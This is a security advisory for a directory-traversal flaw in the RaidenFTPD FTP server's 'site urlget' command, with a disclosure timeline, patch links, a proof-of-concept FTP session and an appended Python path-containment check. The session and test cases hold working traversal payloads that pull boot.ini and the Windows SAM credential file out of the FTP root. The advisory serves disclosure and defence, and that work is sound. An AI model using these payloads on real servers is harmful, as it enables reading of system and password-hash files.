Product : RaidenFTPD
Affected Versions : < 2.4.2241

***

Author: Lachlan. H
Date vendor notified: 19/04/2005
Patch released: 20/04/2005
Disclosure: 02/05/2005

***

Product Description:

RaidenFTPD is an easy-to-use FTP server for Windows. With this tool you can share your files with friends, provide file download services to customers, or even set up your own private network file server. All the basic FTP server features are built in, and it also offers advanced features such as SSL/TLS, UTF-8, UPnP NAT traversal and more.

***

Problem:

Directory Traversal - failure to validate input for the site command 'urlget'. Using urlget, a normal user can escape the FTP root and download files with known paths from restricted directories. As the PoC shows, the server's check catches one spelling of the traversal but not a slight variation of it, and the retrieved file then appears in the user's own directory listing. The JohnLong Team acted promptly to resolve the issue.

***

Fix:

http://www.raidenftpd.com/en/
FULL : http://www.raidenmaild.com/download/raidenftpd2.exe
UPDATE : http://www.raidenmaild.com/download/update.exe

***

PoC:

230 User ****** logged in.
ftp> quote site urlget file://\..\\boot.ini
550 site urlget failed : hacking attempt , you have been logged.
ftp> quote site urlget file:/..\\boot.ini
220 site urlget : downloading file:/..\\boot.ini->boot.ini
ftp> ls
200 Port command ok.
150 Opening ASCII data connection for ls /.
boot.ini
226-free disk space under this directory : 28919 mb
226 Transfer finished successfully. Data connection closed .
ftp: 10 bytes received in 0.00 Seconds 10000.00Kbytes/sec.
ftp> quote site urlget file:/..\\winnt/repair/sam
220 site urlget : downloading file:/..\\winnt/repair/sam->sam
ftp> ls
200 Port command ok.
150 Opening ASCII data connection for ls /.
boot.ini
sam
226-free disk space under this directory : 28919mb
226 Transfer finished successfully. Data connection closed .
ftp: 15 bytes received in 0.00Seconds 15000.00Kbytes/sec.
ftp>

***
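The two urlget arguments in the PoC differ only in the slashes between the scheme and the '..', which is why a check that looks for one spelling catches the first and misses the second. The following is an added illustration, not RaidenFTPD's own code (the vendor's fix is not published): it canonicalises the requested path against the FTP root and tests containment, so both advisory payloads are rejected by the same rule. The root C:\ftproot and the pub/readme.txt request are assumed values.

```python
import ntpath

# Assumed FTP root for the demonstration; the advisory does not give one.
FTP_ROOT = r"C:\ftproot"


def resolve_urlget_target(arg: str, root: str = FTP_ROOT):
    """Map a 'site urlget file:...' argument to an on-disk path under root.

    Returns the canonical absolute path if it stays inside root, or None
    if it would escape. The check canonicalises the path instead of
    looking for one particular '..' spelling, so it does not depend on
    how many slashes follow the scheme or whether '/' or '\\' is used.
    """
    if not arg.lower().startswith("file:"):
        return None                      # only file: URLs are handled here
    rest = arg[len("file:"):]
    # 'file:/x', 'file://x' and 'file://\x' all name the same relative path
    rest = rest.lstrip("/\\")
    # Windows semantics: '/' and '\\' are separators and '..' pops upward.
    # An absolute 'rest' (e.g. 'C:\\...') makes join() discard root, and
    # the containment test below then rejects it.
    candidate = ntpath.normpath(ntpath.join(root, rest))
    root_norm = ntpath.normpath(root)
    inside = candidate.lower() == root_norm.lower() or \
        candidate.lower().startswith(root_norm.lower() + "\\")
    return candidate if inside else None


# The payloads from the advisory plus one legitimate request (constructed).
CASES = {
    r"file://\..\\boot.ini": None,               # form the server rejected
    r"file:/..\\boot.ini": None,                 # form the server accepted
    r"file:/..\\winnt/repair/sam": None,
    "file:/pub/readme.txt": r"C:\ftproot\pub\readme.txt",
}


def check_cases() -> bool:
    """True when every case resolves to the expected result."""
    return all(resolve_urlget_target(a) == want for a, want in CASES.items())


if __name__ == "__main__":
    for arg, want in CASES.items():
        got = resolve_urlget_target(arg)
        print(f"{arg!r:32} -> {got!r}  ({'ok' if got == want else 'MISMATCH'})")
```

The normalisation here is purely lexical; a real server should additionally resolve junctions, symlinks and 8.3 short names through the OS before applying the containment test.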